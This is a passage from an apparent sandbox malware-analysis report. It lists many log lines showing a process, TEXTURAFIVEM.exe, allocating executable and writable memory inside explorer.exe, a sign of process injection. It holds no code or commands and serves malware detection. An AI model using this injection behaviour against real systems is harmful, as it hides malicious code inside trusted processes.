            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 4FE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5070000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5080000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5090000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 50E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5170000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5180000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5190000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 51A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 51B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 51C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 51D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 51E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5270000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5280000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5290000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 52A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 52B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 52C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 52D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 52E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5370000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5380000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5390000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5470000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5480000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5490000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5570000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5580000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5590000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5670000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5680000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5690000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5770000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5780000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5790000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5870000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5880000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5890000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5970000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5980000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5990000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 24010000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 32D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 32E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 32F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3380000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3390000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 33A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 33B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 33C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 33D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 33E0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 33F0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3600000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3610000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3620000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3630000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AD0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AE0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3AF0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B00000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B10000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B20000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B30000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B40000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 3B50000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5310000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5320000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5360000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5370000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5380000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5390000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 53C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5450000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5460000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5470000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5480000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 54D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5560000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5570000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5580000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5590000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 55D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5660000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5670000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5680000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5690000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 56D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5760000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5770000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5780000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5790000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 57D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5860000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5870000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5880000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5890000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 58D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5960000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5970000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5980000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5990000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59A0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59B0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59C0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 59D0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A60000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A70000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A80000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5A90000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AA0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AB0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AC0000 protect: page execute and read and writeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 5AD0000 protect: page execute and read and writeJump to behavior
